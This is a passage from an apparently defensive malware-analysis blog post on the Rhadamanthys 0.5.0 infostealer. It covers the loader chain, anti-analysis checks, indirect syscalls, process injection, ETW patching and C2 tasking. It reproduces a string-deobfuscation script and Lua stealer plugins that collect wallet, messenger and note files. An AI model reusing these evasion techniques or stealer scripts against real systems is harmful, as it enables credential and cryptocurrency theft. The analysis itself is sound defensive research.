13. Fix the issue of using the browser to use the online password library after logging in to a Google account in Chrome, and obtaining the login password.
14. The task module has been greatly upgraded, and a new plug-in module has been introduced to support users in secondary development of their own plug-ins.
Supports multiple task execution modes:
Normal execution
In Memory LoadPE Execution
Powershell Execution
DotNet Reflection Execution
DotNet Extension Execution
DotNet Extension with Zip Execution
VbScript Execution
JScript Execution
X86 shellcode execution
X64 shellcode execution
Native Plugin Loader
15. Keylogger: supports recording all keyboard input, process details, file name, window title, supports setting process filtering, sending time, buffer size
16. Data spy plug-in: currently supports correct login access and IP username and password for remote RDP access. The correct certificate file and password imported by the user.
17. Plug-ins and loader modules support secondary development and provide SDK support.

In this blog, we present a walkthrough a sample that belongs to this release.

The initial loader

The initial loader is a 32-bit Windows executable (PE). It was in large part rewritten, but still contains artifacts that make it similar to the previous edition (0.4.9).

The author added a check of the executable’s name. When the samples are uploaded to sandboxes for automated analysis, they are often renamed as hashes. Therefore, if the name consists of characters from a hexadeciamal charset [0-9, a-f, A-F], and its length is 16, 32, 40, or 64, the malware assumes that it is being analyzed, and exits immediately.

Similarly as we saw in the earlier releases, the initial executable contains the configuration (embedded by the builder) as well as the package with additional modules, that constitutes the next stage. As the execution progresses, these later components are unpacked, and the configuration is passed to them.

Figure 3 – Overview of the relationship between the components used at this stage.

The first change that we can observe during the initial triage is a new section: .textbss. This section is empty in the raw binary (raw size = 0). However, will be filled at runtime with an unpacked content: a shellcode similar to the one used by the previous versions. The difference is that in the past versions the analogous code was loaded into a newly allocated memory region. Regardless of location, its role didn’t change: it is meant for unpacking and loading the first module from the package.

Below is a fragment of the tracelog (created with TinyTracer) that illustrates the loading of the shellcode, and the calls executed from it (v.0.5.0):

1e91;kernel32.WaitForSingleObject
1e99;kernel32.CloseHandle
1eb7;[.text] -> [.textbss] ; <- redirection to the code that unpacks the XS module
27000;section: [.textbss]**
27311;kernel32.VirtualAlloc
270c1;kernel32.VirtualAlloc
2726d;kernel32.VirtualFree
27363;kernel32.VirtualAlloc
273bd;kernel32.VirtualProtect
273f0;kernel32.VirtualFree
27052;called: ?? [12081000+8a] ; <- redirection to the new module (XS)

For comparison, this is the corresponding tracelog fragment from version 0.4.9:

18b3a;kernel32.HeapFree
18b43;kernel32.HeapDestroy
184dc;ntdll.ZwProtectVirtualMemory
184e6;called: ?? [a7a0000+0] <- re direction to the shellcode that unpacks the XS module
> a7a0000+2fe;kernel32.LocalAlloc
> a7a0000+ba;kernel32.LocalAlloc
> a7a0000+260;kernel32.LocalFree
> a7a0000+34c;kernel32.VirtualAlloc
> a7a0000+3a4;kernel32.VirtualProtect
> a7a0000+3bb;kernel32.LocalFree
> a7a0000+52;called: ?? [10641000+88] <- redirection to the new module (XS)

The next stage, as before, is in a custom executable format. The format itself hasn’t changed since the release of 0.4.9. Once more we are dealing with XS1 (as described in our article [1]) which can be converted into a PE with the help of our tools.

The 2nd stage loader (XS1)

The component revealed (in the XS1 format) is part of the second stage of the loading process. Looking at this module we can see many similarities to the one described in [1]. Yet, clearly some parts are enhanced and improved.

One of the changes shows up in the initial triage, at the attempt to dump strings from the binary. In the past, we could obtain a lot of hints about the module functionality by dumping the strings i.e. with the help of the Flare FLOSS tool. This is no longer possible as the author decided to obfuscate them (more details in “String deobfuscation and the use of TLS”).

After converting the module to PE, and opening it in IDA, we can follow up with a more detailed assessment. Looking at the outline of the start function, we see a slightly different, refined design.

Figure 4 – The main_func is now passed as a callback to the function that initializes the XS module (loads imports, allocates storage, etc)

As before, the module uses the configuration passed from the previous layer. The decoded buffer starts with the !RHY marker, and contains, among others, the URL of the C2 to be contacted. This is the reconstructed structure:

struct rhy_config
{
DWORD magic;
BYTE flags1;
DWORD flags2;
_BYTE iv[16];
_BYTE key[32];
char C2_URL[128];
};

Just like in the previous version, the connection with the C2 is established by the netclient module which is loaded from package #1 (see Figure 3).

In addition, the current component unpacks and uses multiple modules that are shipped in package #1. We already saw some of them in the previously described versions. The full list is below.

NameFormatDescriptionNew in 0.5.0?stage.x86shellcode (32-bit)Shellcode used in the injection of the main module of the Stage 2 into another process; responsible for accessing the named mapping, copying its content, and reloading the main module in the context of the new process✓early.x86XSProcess injector (using raw syscalls)✓early.x64XSProcess injector (using raw syscalls)✓phexec.binXSInjects from a 32-bit process into a 64-bit–prepare.binshellcode (64-bit)–unhook.binXSChecks DLLs against hooks, and does unhooking if needed–strategy.x86XSChecks if any of the forbidden processes is running (evasion)✓process.xTXTList of forbidden processes (evasion)✓ua.txtTXTA list of user-agents (a random user-agent from the list will be selected and used for the internet connection)–dt.x86XSEvasion checks based on Al-Khaser–proto.x86shellcodeEncrypts and decrypts netclient module with the help of RC4 and a random key–netclient.x86XSResponsible for the connection with the C2 and downloading of further modules–

A simplified flow:

Figure 5 – A high-level overview of the relationships between the components at this stage.

More details about the execution flow, and possible diversions from the presented path, are explained later in this report.

String deobfuscation and the use of TLS

One of the new features in this release is the introduction of TLS (Thread Local Storage) for temporary buffers. They are used, among others, for decoding obfuscated strings.

TLS is first allocated in the initialization function (denoted as init_xs_module in Figure 4). The value received from TlsAlloc is stored in a global variable. The malware then allocates a custom structure with a buffer and attaches it to the TLS.

Later on, that saved buffer is retrieved and used multiple times, as a workspace for deobfuscating data, such as strings.

Figure 6 – The string deobfuscation function is applied on a hardcoded value (pointing to the encrypted string).

The string decryption function is passed as a callback to the function retrieving a buffer attached to the TLS storage.

Figure 7 – The string decryption function is set as a callback to the function fetching the buffer from TLS.

After the string is used, the buffer is cleared (see Figure 6).

The use of TLS in the implementation of this functionality is quite atypical, and it isn’t clear what was the reason behind this design.

The algorithms used for the string deobfuscation differ at different stages of the malware. In the case of the current module (XS1, Stage 2) the following custom algorithm is deployed:

#!/usr/bin/env python3

def mix_key_round(ctx, size, key3, key2, key_size):
if not size: return
for i in range(size):
pos = key_size % size
key_size += 87
val = ctx[pos]
result = (key2 + ((val >> 5) & 0xFF)) + ctx[(val % size)] + (i * (((val + key3) >> 3) & 0xFF)) + 1
ctx[i] = (ctx[i] + result) & 0xFF
return ctx

def decrypt_data(in_buf, in_size, key_buf, key_size, key2, key3):
out_buf = [0] * in_size
ctx = [key_buf[(i % key_size)] for i in range(in_size)]
for _ in range(4):
ctx = mix_key_round(ctx, in_size, key3, key2, key_size)
for i in range(in_size):
out_buf[i] = (ctx[i] ^ in_buf[i]) & 0xFF
return out_buf

def decrypt_string(in_buf, key_buf):
return decrypt_data(in_buf, len(in_buf), key_buf, 16, 0x3779E9B, 0)

The decryption key is stored at the beginning of the block and is always 16 bytes long. The data is terminated by 0.

The IDA script for strings deobfuscation (assuming that the decrypting functions are named, appropriately: dec_cstring and dec_wstring):

https://gist.github.com/hasherezade/c7701821784c436d40d1442c1a623614

The list of the deobfuscated strings for the Stage 2 loader:

https://gist.github.com/hasherezade/fb91598f6de62bdecf06edf9606a54fb

Raw syscalls and Heaven’s Gate

One of the techniques that we can observe across different Rhadamanthys modules is the use of raw syscalls for calling native API. This is a known way to evade function hooking and monitoring, and also helpful in obfuscating the names of the APIs used. This technique has a long history and occurs in multiple different variants (described, i.e. here: [3]).

The method relies on the fact that each native system function (implemented kernel-mode) is represented by a syscall ID. These IDs may differ depending on the Windows version. For the programmer’s convenience, Windows allows access to them via API exported by system DLLs such as NTDLL and WIN32U. NTDLL is often hooked by antimalware products, in order to watch the called APIs and detect suspicious activity.

Malware tries to bypass the installed hooks by copying the numbers of syscalls directly to its own stubs, so that it won’t have to use the NTDLL. However, doing so generates another event that some monitoring tools may find suspicious, as it’s not usual to execute a syscall from a non-system module.

Looking at the implementation, we can see that the author was well aware of this problem and used a variant of the technique called indirect syscalls. The stub within the malware only prepares the syscall and its actual execution is done by returning to the NTDLL at the end of a function. In this way, the initial part of the function that contains the hook is bypassed, but the syscall is called from the NTDLL.

Figure 8 – Implementation of indirect syscalls used by Rhadamanthys.

The raw syscalls are used by Rhadamanthys in both 32 and 64-bit modules. As we know, a syscall can be performed only from a module that has the same bitness as the operating system. Doing a syscall from the WoW64 process (32-bit process on 64-bit Windows) requires a different approach, and using wrappers that may be different for different versions of Windows [4]. Underneath, each of those wrappers temporarily switch the process from 32-bit to 64-bit mode. The author of Rhadamanthys decided not to use existing wrappers, but instead implement his own, using the Heaven’s Gate [6] technique.

Execution flow

The role of the modules involved in the Stage 2 hasn’t changed since the last version. They are meant to prepare and obfuscate the downloading of the actual stealers that are shipped in package #2 supplied by the C2. As we know, the download operation is performed by the netclient module. The author used several other modules to scrupulously check the environment and make it harder for an analyst or various monitoring tools to track when the download occurs.

Depending on the settings, it is possible to load next modules into the current process, or to add an extra round by injecting the current module into a new process, and deleting the original file.

Figure 9 – Overview of the main function. Different execution paths can be deployed depending on the flags set in the configuration. If the restart flag is set, on the first run the module injects itself into a new process.

In the case of the analyzed sample, the restart flag was selected. This caused the main loader module to run twice, with two different paths of execution.

On the first run, the malware injects itself into a newly created process. It is implemented in the following steps:

Creates a named mapping where it places important data, such as encrypted config, the package containing later modules, the path to the original sample, checksums of functions to be used, etc.

Unpacks modules implementing the process injection, 32 or 64-bit, depending on the system. These modules export several helper functions that are implemented using raw syscalls (for more about the method used see “Raw syscalls and Heaven’s Gate”). In the currently analyzed sample, the modules were named early.x86 and early.x64 . They may be different depending on the build, as since 0.5.0 distributors can customize what injection method will be used.

The loader creates a new 32-bit process, and implants there the stage.x86 with the help of functions exported from the injector component.

The implanted shellcode is responsible for accessing the named mapping, copying its content, and reloading the Stage 2 module in the context of the new process. It then calls an alternative variant of the Stage 2 main function (main_alt in the XS1 structure [1]), to deploy the second execution path.

The target for the injection is selected from a hardcoded list, and can be one of the following:

L”%Systemroot%\system32\dialer.exe”
L”%Systemroot%\system32\openwith.exe”
L”%Systemroot%\system32\dllhost.exe”
L”%Systemroot%\system32\rundll32.exe”

The execution second path is deployed when the module runs inside the new process. It involves deleting the original malware file (if the relevant flag was selected in the configuration) and loading the other modules from package #1, including netclient.

Figure 10 – The alternative version of the main function (main_alt), called from the injected process.

After performing the evasion checks, and making sure that the process is not monitored (with the help of additional modules), the malware connects to the C2 and downloads the next package (package #2 – Figure 5) with the stealer modules. Just like in the previous version, the package is shipped in a steganographic way, appended to the JPG or WAV file (for more details, refer to [1]).

Retrieving Stage 3: stealer components

Figure 11 – Execution flow of the modules

Two modules are involved in downloading the payload: netclient (in XS1 format) and proto (shellcode). They are both loaded into the same memory region, and proto is copied after the netclient. First netclient is called from the main module, with the appropriate parameters: the address of the C2 copied from the configuration, and the User Agent, selected from the ua.txt list (if the list fails to load, a hardcoded User Agent is used as a backup).

Figure 12 – The Entry Point of the netclient module is called in the Event callback function

The interesting element of the flow is that at the beginning of the netclient execution, the main XS1 component gets encrypted. It is decrypted later, just before the execution returns to it. The encryption and decryption are done with the help of the proto module, which is called twice by netclient. This is yet another obfuscation step to minimize the memory artifacts.

Figure 13 – If we try to view the code of the main module, i.e. go to the offset that called netclient, we can see that it no longer makes sense – as it was encrypted.

The netclient is responsible for connecting to the C2 and downloading the payload, then decrypting it. As before ([1]) the correctness of the resulting buffer is verified by comparing the hash calculated from the content with the expected hash that is stored in the header of the data block. In the currently analyzed case, the payload was shipped appended to a file in the WAV format.

Figure 14 – The downloaded package after decryption

After the payload is downloaded, and passes the verification step, netclient module calls proto for the second time to decrypt the previously encrypted main module (XS1), using the RC4 algorithm and the key that was generated and saved at the first run.

The execution goes back to the (now decrypted) main module, which first destroys the memory region where netclient and proto were loaded. It then proceeds to load the next stage from the downloaded package #2.

Depending on whether the system is 32 or 64-bit, further execution may proceed in the current process, or in a newly created, 64-bit process, where the required elements are injected.

On a 64-bit system

Most of the time we encounter a 64-bit version of Windows, which means there are several extra steps before the content from the downloaded package can be fetched and executed.

The malware creates a new, 64-bit process, selecting one of the paths from the hardcoded list:

L”%Systemroot%\system32\credwiz.exe”
L”%Systemroot%\system32\OOBE-Maintenance.exe”
L”%Systemroot%\system32\openwith.exe”
L”%Systemroot%\system32\dllhost.exe”
L”%Systemroot%\system32\rundll32.exe”

As writing into a 64-bit process from a 32-bit one is not officially supported by the Windows API, it uses Heaven’s Gate technique [6] to do so. This time the injection functions are encapsulated in an additional module from package #1: phexec.bin.

The malware now uses a 64-bit module prepare.bin, which is to be injected and used to retrieve the downloaded package #2 from inside the new process. The module prepare.bin is a shellcode containing an empty data section to be filled. The unfilled version of the section starts with the marker YHR! which is replaced with 0xDEADBEEF after it is filled.

Figure 15 – Filled in data within the prepare.bin module.

Data transmission using BaseNamedObject and the use of Exception Handlers

The loader (32-bit executable) creates a named object that is used to share the information between the current process and the infected one (64-bit). The content downloaded from the C2 is passed to this object and then received in the other process, via prepare.bin.

During the injection, the prepare.bin is implanted into a fresh 64-bit process. The execution is redirected by patching the Entry Point of the main executable with a jump that leads to the shellcode.

The shellcode (prepare.bin) contains a loop waiting for the BaseNamedObject to be filled. It sets a Vectored Exception Handler that is triggered after the data transfer from the other process is finished. The use of an exception handler is intended to be an additional obfuscation of the execution flow.

During its execution, the shellcode installs some more patches in the original executable of the process, and returns back to the patched code after the exception handler was registered. The overwritten code changes the memory protection and waits for the first malware process to send data over the BaseNamedObject.

Figure 16 – The code of the infected executable overwritten during shellcode execution, performing wait.

When the wait is over, it triggers an exception executing the int3 instruction. As a result the execution lands in the Vectored Exception Handler, that is installed by the shellcode.

The exception handler is responsible for unpacking the retrieved package, fetching from it the next shellcode, and redirecting the execution. The further flow, starting from the retrieved shellcode from package #2, is analogous to the execution on a 32-bit system described below.

Figure 17 – The exception handler responsible for unpacking the retrieved package, fetching from it a shellcode, and redirecting the execution.

On 32-bit system

The first element fetched from the new package is a shellcode.

Figure 18 – Two alternative paths after the data is downloaded from the C2. If the system is 32-bit, the shellcode from the downloaded package is copied into the current process, and then run in its context. Otherwise, it is injected into a new, 64-bit process.

The shellcode decrypts and decompresses the rest of the downloaded package. It then fetches the main stealer module, which is in the XS2 format [1].

Figure 19 – The module in XS2 format revealed in memory

The unpacked module is loaded into a newly allocated memory region. However, the redirection contains some additional steps. Once again, the author took extra care to minimize the memory artifacts and made sure that the loading shellcode is released after use. A a small chunk of the shellcode is copied to the new memory region, just after the loaded XS2 module. After that block, other necessary data is copied, including the pointer to the package, and the Entry Point of the next module. After finishing, the loading function jumps to such a prepared stub. As the stub is in the new memory region, it can free the region containing the unpacking shellcode before the redirection to the next stage.

Figure 20 – The copied stub frees the loading shellcode, and then redirects to the next module.

Stage 3: coredll.bin (XS2)

After passing the full loading chain, the execution finally reaches the main stealer module: coredll.bin (in XS2 format). The module coordinates all the work, collects the results, and reports them back to the C2. It is also responsible for retrieving other modules from package #2, and using them to perform various tasks.

In the current release, the following modules are available in the package:

Module pathTypeRoleIs new in 0.5.0?/bin/i386/coredll.bin
/bin/amd64/coredll.binXSMain stealer module (analogous to the one described in this chapter)–/bin/i386/stubmod.bin
/bin/amd64/stubmod.binXSPrepares a .NET environment inside the process, to load other .NET modules–/bin/i386/taskcore.bin
/bin/amd64/taskcore.binXSManages additional modules for the tasks supplied by the C2✓/bin/i386/stubexec.bin
/bin/amd64/stubexec.binXSInjects into regsvr32.exe, and remaps the module into a new process–/bin/KeePassHax.dllPE (.NET)Steals KeePass credentials–/bin/runtime.dllPE (.NET)Runs PowerShell scripts and plugins in the form of .NET assemblies–/bin/loader.dllPE (.NET)General purpose .NET assemblies runner✓

As seen earlier, the malware supports up to 100 LUA extensions. They are loaded from the package, retrieved by paths in the format: /extension/%08x.xs.

The coredll.bin not only coordinates the work of other modules, but also has a lot of vital functionality hardcoded. It comes with a collection of built-in stealers that can be enabled or disabled depending on the configuration.

String encryption

In case of this module not all strings are obfuscated, so we can obtain some of them with the help of common applications such as FLOSS . Those are mainly strings from the statically linked libraries. The most important strings, relevant to the malware functionality, are encrypted and revealed just before use. Once again, TLS storage is used for the temporary buffer. This time the algorithm used for the decryption is RC4. The first 16 bytes of the input buffer is the key, followed by the encrypted data.

IDA script for deobfuscation:

https://gist.github.com/hasherezade/51cb827b101cd31ef3061543d001b190

Deobfuscated strings from the sample:

https://gist.github.com/hasherezade/ac63c0cbe7855276780126be006f7304

Communication between the modules

As there are multiple modules involved in the execution of various tasks, and some of them are injected into remote processes, they must communicate with the central module (coredll.bin), to coordinate the work and pass the collected results. The communication is implemented with the help of a pipe.

Figure 21 – The function creating the pipe within the main module.

The pipe is created by the main module, using the name Core and the current PID. This information, concatenated together, is hashed (SHA1), and the hash is used to generate the unique pipe name (following the pattern \.pipe{%08lx-%04x-%04x-%02x%02x-%02x%02x%02x%02x%02x%02x}).

Figure 22 – The function used to generate the pipe name.

The PID is further passed to the submodules so they can regenerate the name, following the same algorithm, and then establish the connection.

Execution flow

After the module finishes initialization, which is typical for the XS2 format [1], execution is redirected to the main function of the module. The function takes 3 arguments: the pointer to the current module, a command to be executed, and a structure, including all the data passed from the previous layers. Depending on the command argument, the module can follow one of the 4 different execution paths. In each case, the most important functionality is to load additional components, establish the connection with the C2, and deploy the built-in stealers.

Figure 23 – The overview of the main function within the Core module.

In some cases, the function responsible for running all the modules can be executed at the exit of the application where it is injected. It is implemented by hooking the ExitProcess function.

Disabling the Event Tracer (and other NTDLL patches)

At the beginning of the main function (Figure 23), we can see a function patching NTDLL. Its role is to disable Event Tracering (ETW), which is a built-in Windows feature allowing to collect information about the application behavior. The bypass is implemented similarly to that described in the article [5].

In the case of the WoW64 process, both the 32-bit and the 64-bit version of the NTDLL are patched. By scanning the process with PE-sieve, we can quickly dump the modified versions of NTDLLs and receive the .tag file informing about the hooks. The found patches are listed below.

In NTDLL 64-bit:

The installed patch is simple, it forces the EtwEventWrite function to always return 0.

Figure 24 – The patch in the NTDLL (64-bit), disabling function EtwEventWrite.

The patches (NTDLL 32-bit):

Here we can see two functions patched: EtwEventWrite and NtTraceEvent – they both are forced to return immediately at the start.

Figure 25 – Multiple patches in the NTDLL (32-bit), including the ones disabling ETW.

Additionally, we can see a hook inside the exception dispatcher, whose role was described in detail in our previous article on Rhadamanthys [1] (”Handling exceptions from a custom module”). In contrast to other hooks that are security bypasses, this hook is part of the XS format loading and allows to catch the exceptions thrown by the custom module.

Running the stealers

The main component of Stage 3 comes with a rich set of built-in stealers. They are stored as two distinct global lists. The first group involves stealers that rely on searching and parsing files of particular targets (i.e., profiles, local databases), which we refer to as “passive stealers”. The second set which we refer to as “active stealers” consists of more invasive components: they can interfere with running processes, inject into them, etc.

Figure 26 – Global lists of the passive and active stealers.

Each stealer has an initialization function and a run function. They also use a top-level structure from where they fetch the data and where they report back the results. By sharing this structure, they can pass data from one to another, working as elements of the pipeline. The overview of the function responsible for running the stealers:

Figure 27 – Fragment of the function responsible for the deployment of the stealers.

First, the malware enumerates all the processes and stores their names, along with their PIDs, in a structure that will be used later. Then, all the built-in active stealers are initialized in a loop. At this point, they may reference the list of the processes to check if their targets are on the list. Some of them may also read additional information from the process, which will be passed further into the pipeline. Next, the passive stealers are initialized. The User Profile Path is retrieved and walked recursively to check if it contains some targeted directories from which the malware can steal.

After the initialization of both types of stealers is finished and information about the targets is collected, the functions performing the actual stealing activities run. First, all the initialized profile parsers are executed in a loop to collect the information from the files. Finally, the active stealers are executed.

After all the hardcoded stealers were run, the malware initializes a built-in LUA interpreter and uses it to execute the additional set of stealers, implemented as LUA scripts (described in more detail in “The LUA scripts“).

The results of all the executed stealers are collected in a global structure. They are posted into the queue and later uploaded to the C2.

The passive stealers

As mentioned earlier, passive stealers rely on reading and parsing files belonging to particular applications to retrieve saved credentials.

The passive stealers are initialized by parsing recursively all the subdirectories in %USERPROFILE% and checking the presence of targeted paths. The inner function enumerates all the directories in the %USERPROFILE%, and on each new directory found, it executes a passed callback.

The callback then runs the full list of initialization functions (is_target) of the stealers. If the path is identified as a target, the relevant passive stealer is further initialized.

Figure 28 – A loop initializing passive stealers with the directories found recursively in the %USERDATA% directory.

The paths used for the target identifications (passive stealers):

TargetPaths/extensionsIs OptionalChrome“Web Data”, “Web Data Ts4”noFirefox“cookies.sqlite”noFileZilla“recentservers.xml”yesOpenVPN“OpenVPN Connectprofiles”, “.ovpn”yesTelegram“configs”, “D877F783D5D3EF8Cconfigs”yesDiscord“DiscordStorage”, “discordptbStorage”, “discordcanaryStorage”yesStickyNotes“Microsoft.MicrosoftStickyNotes”, “plum.sqlite”yes

The malware comes with a statically linked SQLite library which allows it to load and query local SQLite databases, and fetch saved data such as cookies.

The active stealers

The set of active stealers is more interesting and diverse. Some of these stealers open running processes and inject additional components. One of such components is KeePassHax.dll, injected into the KeePass process, to steal credentials from this open-source password manager (more details in: “Stealing from KeePass”). The malware may also inject its main component (core.bin) into other applications.

The set of the stealers is too big to describe each of them in detail. In summary, the following applications are targeted:

ChromeVaultWinSCPStickyNotesKeePassMozilla products (Thunderbird, Firefox)
and some of the Firefox-based browsers,
such as K-Meleon.exeFoxMailTelegramStreamTeamViewerInternet ExplorerOpenVPNDiscordCoreFTP360Browser

Stealing from Chrome and Mozilla products

In some cases, the active stealer’s initialization function retrieves from the running process information about the current profile and configuration files. It is done for the following targets:

K-Meleon.exe (Firefox-based browser), Firefox

Chrome

The approach to finding the loaded profile is a bit different in each case.

In the case of K-Meleon.exe it identifies the target files by paths retrieved from associated handles. First, the malware retrieves all object handles that are currently opened in the system, using NtQuerySystemInformation (with the argument SystemHandleInformation). It walks through obtained handles and selects the ones owned by the target process. Then, it iterates over those handles to check which names they are associated with (using NtQueryObject), and compares each name with the hardcoded one (places.sqlite) . If the check passed, the full path is retrieved and stored for further use.

Figure 29 – Searching for the configuration file (“places.sqlite”) by walking through the retrieved object handles.

In the case of Chrome, the current profile is provided in the command line used to run the application. The command line of a process is stored in a dedicated field of the PEB (PEB → ProcessParameters → CommandLine), which is where the malware retrieves it from. The path to the profile is given after the —user-data-dir= command line argument, so this hardcoded string is used for the search.

As mentioned earlier, the main stealing actions are executed in the run function of each stealer. The stealers targeting Mozilla products may deploy additional processes and inject there the main module of the malware: coredll.bin. Note that although it is the same module as the one currently described, its execution path is not identical. Looking at the XS2 header [1], we can see that this format lets you provide alternative entry points of the application (denoted as entry_point – primary, and entry_point_alt – secondary). The execution of the implanted coredll.bin starts in entry_point_alt. Looking at the injection routine, we can see the corresponding address being added to the APC queue of the target’s main thread.

Figure 30 – Fragment of the injecting function, responsible for selecting the alternative Entry Point of the module, and setting it in the APC Queue of the targeted process, for execution.

The alternative entry point leads to the execution of a minimalist main, which contain only Mozilla-specific stealers.

Depending on the given settings, the stealing functions can be executed immediately, or when the application exits. The execution at exit may be necessary in case the current process blocks some files from which the module wants to read.

Figure 31 – The overview of the Alternative Entry Point of the coredll.bin. We can see that the main, stealing function, can be executed either immediately, or at the exit of the process.

There are three stealers implemented, and selected depending on the given configuration. Each of them sends the stolen content over the pipe back to the main element.

Figure 32 – The function responsible for deploying a specific, targeted stealer attacking the Mozilla application data.

Stealing from KeePass

One of the modules shipped in the package is a .NET DLL named KeePassHax.dll. As the name suggests, this module targets the KeePass password manager (which is a .NET application). The DLL is injected into the target along with the assisting native module, called stubmod.bin. An interesting feature of the implementation is that it initializes the complete .NET environment of an appropriate version within the attacked KeePass process, just to deploy the stealing DLL.

The function leading to the deployment of those components belongs to the active stealers list. As explained earlier, every stealer has two callback functions: init and run. In this case, the first function is empty, as there is nothing to initialize. The activity starts in the run function, given below. First, it searches for the keypass.exe on the previously prepared list of running processes. If the name is found, it tries to inject the malicious modules into the corresponding process.

Figure 33 – Fragment of the function responsible for doing an injection into the KeePass.exe. The injected payload, and the function to be executed from it, are passed as arguments.

Two modules are fetched from the package: stubmod.bin (in a 32 or 64-bit version, matching the process) and KeePassHax.dll. The stubmod.bin is an executable in the custom XS format [1], containing native code. This module is executed first, and prepares the stage for loading the DLL.

The start function of the stubmod.bin initializes the whole .NET environment inside the process where it is injected, similar to what is described in the following writeup [6].

Figure 34 – Overview of the function responsible for custom initialization of the .NET environment within the process.

It then runs the KeePassHax.dll. As an argument, it passes a callback function which is responsible for sending the collected data to the main malware process, over the previously created pipe (more details in “Communication between the modules”). The way of passing the callback is a bit unusual, yet simple and effective: the pointer is first printed as a string and then given as an argument to the DllMain function of the KeePassHax.dll.

Figure 35 – The pointer to the callback function is printed as a string and then passed as an argument to the .NET module.

Looking at the DllMain function, we can see the argument being parsed and used as two combined pointers. One of the pointers, stored in the variable NativePtr, leads to the function that sends data over the pipe (that is a part of stubmod.bin). The other one stored in NativeData contains a PID of the process running the core module, which is needed to regenerate the pipe name.

Figure 36 – The DllMain function of the KeePassHax.dll.

The main actions of dumping the credentials are done by the function KcpDump, which retrieves values of relevant fields from the main KeePass form.

Figure 37 – The function KcpDump in the .NET module KeePassHax.dll.

The collected data is serialized and passed to the previously retrieved native function. The first supplied argument is a NativeData containing the PID passed from the caller.

Figure 38 – The KcpSendData function in the .NET module KeePassHax.dll.

The function Program.FnSendData is implemented in the native module, which was responsible for executing the KeePassHax.dll, and has the following prototype:

int __cdecl to_read_write_to_pipe(int seed, DWORD numberOfBytesToWrite, _BYTE *data, int data_size)

The supplied seed argument is used in the generation of the pipe name, where the data is written to.

Figure 39 – Generating the pipe name, analogous to the function described in “Communication between modules”

This is how various components, native (in a custom format) as well as .NET modules, are blended together as one injected payload.

The LUA scripts

Although the list of stealers available by default is already very rich, the author decided to provide even more options by incorporating a LUA script runner.

The main module can load up to 100 LUA scripts. In the analyzed cases, we found approximately 60 of them are used. They implement a variety of stealers that target cryptocurrency wallets, FTP applications, e-mail agents, SSH, and more.

First, the malware loads all the available scripts from the package in a loop. They are stored in the internal structure, that is later passed to the interpreter.

Figure 40 – A LUA script fetched from the package and revealed in memory.

Scripts work as plugins to the built-in framework.

Stealers are grouped by one-character identifiers:

IDTypeWwalletsEe-mailsFFTPNnote-keeping appsMmessengersVVPN2authentication related, password managers, etc.

The stealer starts with a check if the group it belongs to is enabled in the framework.

if not framework.flag_exist(“W”) then
return

Some examples are given below.

Stealer for Psi:

if not framework.flag_exist(“M”) then
return
end
local filename = framework.parse_path([[%AppData%Psi+profilesdefaultaccounts.xml]])
if filename ~= nil and framework.file_exist(filename) then
framework.add_file(“accounts.xml”, filename)
framework.set_commit(“$[M]Psi+”)
end

Stealer for a DashCore wallet:

local file_count = 0
if not framework.flag_exist(“W”) then
return
end
local filenames = {
framework.parse_path([[%AppData%DashCorewalletswallet.dat]]),
framework.parse_path([[%LOCALAppData%DashCorewalletswallet.dat]])
}
for _, filename in ipairs(filenames) do
if filename ~= nil and framework.file_exist(filename) then
if file_count > 0 then
break
end
framework.add_file(“DashCore/wallet.dat”, filename)
file_count = file_count + 1
end
end
if file_count > 0 then
framework.set_commit(“!CP:DashCore”)
end

Stealer for Notezilla:

if not framework.flag_exist(“N”) then
return
end
local filename = framework.parse_path([[%AppData%ConceptworldNotezillaNotes9.db]])
if filename ~= nil and framework.file_exist(filename) then
framework.add_file(“Notes9.db”, filename)
framework.set_commit(“$[N]Notezilla”)
end

List of all the targeted applications:

ArmoryAtomicDEXAtomicWalletAuthy DesktopAzireVPNBinanceWalletBinanceWalletBitcoinCoreCheckMailClawsmailClawsmailCuteFTPCyberduckDashCoreDefichain-ElectrumDogecoinElectron-CashElectrum-SVElectrumEMClientExodusFrameFtpNavigatorFlashFXPFTPRushGmailNotifierProGuardaJaxxLitecoin-QtLitecoin-QtLitecoinCoreMoneroMyCryptoMyMoneroNordVPNNoteflyNotezillaSSHOutlookPidginPrivateVPNProtonVPNPsi+PuTTYQtum-ElectrumQtumRoboFormSafepaySmartFTPSolar WalletThe BatTokenPocketTotal CommanderToxTrulyMailWinAuthWalletWasabiWindscribeVPNZap

Receiving commands from the C2

In addition to running the modules that were embedded in the package and sending back their results, the malware establishes a connection with the C2 to listen for additional instructions. On demand, it can drop and run additional executable files, or execute scripts via other modules.

There are 11 different supported commands that are identified by numbers.

Figure 41 – Switch-case parsing the commands from the C2 received by the coredll.bin module.

The additional modules that can be run on demand, are taskcore.bin, runtime.dll, and loader.dll.

The content received from the C2 is passed in the variable denoted above as buf. Depending on the specifics of the particular command, it can be saved into a file, or into a named mapping, whose handle is passed to the other malicious module.

For example, the module received from the C2 is passed to be executed via taskcore.bin:

Figure 42 – Fragment of the function running the received module via taskcore.bin. The buffer received from the C2 (containing the module) is added into the mapping, whose handle is passed to the taskcore.bin module, that is run in a new process.

Running received PowerShell scripts and .NET modules

In addition to the ability to run LUA scripts, the malware allows the execution of PowerShell scripts, and since the version 0.5.0, also .NET assemblies. Unlike LUA, the scripts/assemblies to be executed are not shipped in the package but dynamically received from the C2.

This part of the functionality is managed by additional modules from package #2: runtme.dll (runs PowerShell scripts, and plugins) and loader.dll (a general-purpose loader of .NET assemblies).

The modules are run within a new process under the guise of AppLaunch.exe or dllhost.exe.

Evolution of PowerShell runner (runtime.exe/dll)

In the previous versions, the PowerShell runner was implemented as runtime.exe, which is a very small executable written in .NET. The runner consisted of the Main function presented below. It takes two string arguments, which are in fact pointers in hexadecimal form. The pointers lead to the functions in the native module that loaded the current one and are used to pass the input and output. The scripts are received by calling the function sysNativeWrapper.GetScript(), then results are passed back by sysNativeWrapper.SendDumpData(data).

Figure 43 – The .NET module: “runtime.exe” (decompiled using dnSpy)

The new version of the runner is a DLL, not an EXE (runtime.dll). It is fully rewritten, and much more complex. The runner exposes a new interface, to support the API of the newly introduced plugin system.

Figure 44 – List of classes on the runtime.dll (decompiled using dnSpy).

The plugins are in the form of .NET assemblies.

Figure 45 – Fragment of the function executing the plugins (.NET assemblies following the defined API) – runtime.dll, decompiled using dnSpy.

Simple PowerShell scripts, in the form of a string, are supported as well.

Figure 46 – Fragment of the function executing PowerShell scripts – runtime.dll, decompiled using dnSpy.

Loader of .NET assemblies (loader.dll)

